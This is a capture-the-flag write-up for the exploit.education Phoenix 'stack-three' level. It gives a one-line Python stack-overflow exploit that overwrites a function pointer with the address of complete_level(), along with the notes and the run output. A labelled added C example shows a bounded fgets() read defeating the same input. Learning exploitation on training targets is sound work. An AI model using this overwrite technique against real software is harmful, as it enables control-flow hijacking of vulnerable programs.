### Stack Three ###
# Exploit:
python -c "print 'A'*64 + '\x9d\x06\x40'" | ./stack-three
# Notes:
- We want to overflow buffer[64] into the adjacent function pointer fp via
the gets() function, which does no bounds checking, directing code flow to
the function complete_level().
- As fp holds a memory address that the program later calls, we need to
overwrite it with the memory address of complete_level().
- We open ./stack-three in gdb and enter the 'info functions' command
to find the memory address of complete_level().
- We can now append that memory address, in little-endian byte order, to
64 filler bytes to overflow buffer[64] and pipe it all into ./stack-three
like so.
user@phoenix-amd64:/opt/phoenix/amd64$ python -c "print 'A'*64 + '\x9d\x06\x40'" | ./stack-three
Welcome to phoenix/stack-three, brought to you by https://exploit.education
calling function pointer @ 0x40069d
Congratulations, you've finished phoenix/stack-three :-) Well done!
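
# Added example (not part of the original notes or the exploit.education source):
The same input handled by a bounded read instead of gets(), showing that fp stays untouched. The struct layout and the names locals, read_line_bounded and oversized_line_leaves_fp_intact are assumptions modelled on the buffer[64] and fp described in the notes.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout, modelled on the notes: buffer[64] directly followed by fp. */
struct locals {
    char buffer[64];
    void (*fp)(void);
};

/* Bounded replacement for gets(): fgets() stores at most sizeof(buffer) - 1 bytes
 * plus a NUL. Returns 0 = whole line stored, 1 = truncated, -1 = EOF or error. */
static int read_line_bounded(struct locals *l, FILE *in)
{
    int c, truncated = 0;
    if (fgets(l->buffer, sizeof l->buffer, in) == NULL)
        return -1;
    char *nl = strchr(l->buffer, '\n');
    if (nl != NULL) {
        *nl = '\0';
        return 0;
    }
    /* No newline stored: drain the rest of the over-long line. */
    while ((c = fgetc(in)) != EOF && c != '\n')
        truncated = 1;
    return truncated;
}

/* Feeds the input from the notes (64 'A's + 9d 06 40 + newline) to the bounded
 * reader. Returns 1 if the line was flagged too long and fp is still NULL. */
static int oversized_line_leaves_fp_intact(void)
{
    unsigned char input[68];
    struct locals l = { {0}, NULL };
    FILE *in = tmpfile();
    if (in == NULL) return -1;
    memset(input, 'A', 64);
    memcpy(input + 64, "\x9d\x06\x40\n", 4);
    if (fwrite(input, 1, sizeof input, in) != sizeof input) { fclose(in); return -1; }
    rewind(in);
    int rc = read_line_bounded(&l, in);
    fclose(in);
    return rc == 1 && l.fp == NULL && strlen(l.buffer) == 63;
}

int main(void)
{
    printf("fp offset %zu, fp intact %d\n", offsetof(struct locals, fp),
           oversized_line_leaves_fp_intact());
    return 0;
}
```

With this layout fp sits at offset 64, which is why exactly 64 filler bytes precede the address in the notes; the bounded read stops at byte 63 and reports the line as too long.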